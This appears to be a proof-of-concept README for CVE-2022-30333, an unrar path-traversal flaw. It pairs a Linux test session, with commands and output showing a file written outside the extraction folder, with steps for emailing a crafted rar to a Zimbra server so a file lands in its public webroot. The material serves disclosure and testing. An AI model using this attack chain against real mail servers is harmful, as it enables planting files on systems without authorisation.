# CVE-2022-30333-POC 
**Sample file to test CVE-2022-30333**
- [Sample.rar](./sample.rar) : if you want to test on Linux. When you extract, it create **trav** in **../../tmp/traversed**. Please be sure that directory **../../tmp/traversed** exists before extracting Sample.rar

- [exp.rar](./exp.rar) : if you want to test on Zimbra Mail server. When you extract, it create **moo.txt** in */opt/zimbra/jetty\_base/webapps/zimbra/public/*. You can access this file at https://zimbra_mail_domain/public/moo.txt  
### Testing on Linux
mkdir ../../tmp/traversed (the destination folder must exsist before unrar)

ls -la ../../tmp/traversed/
total 8
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:44 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..

unrar x exp.rar

UNRAR 6.10 beta 1 freeware      Copyright (c) 1993-2021 Alexander Roshal

Corrupt header is found
sym - the file header is corrupt

Extracting from exp.rar

Corrupt header is found
sym - the file header is corrupt
Extracting  sym                                                       OK 
Extracting  sym/trav                                                  OK 
Total errors: 4

ls -la ../../tmp/traversed/
total 12
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:47 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..
-rw-rw-r-- 1 ubuntu ubuntu   14 Jul  4 02:34 trav

cat ../../tmp/traversed/trav
### Testing on Zimbra
- Create an email and attach malicious rar file then send to Zimbra email address. This rar file will be extracted while being analyzed with Amavisd.
- The  moo.txt should be at: */opt/zimbra/jetty\_base/webapps/zimbra/public/moo.txt* or *https://zimbra_mail_domain/public/moo.txt*

1. [Vietnamese blog from DEV2SEC](
2. [English blog from Sonarsource](
3. Special thanks to **mrlihd** for helping me rebuild attack-chain in Zimbra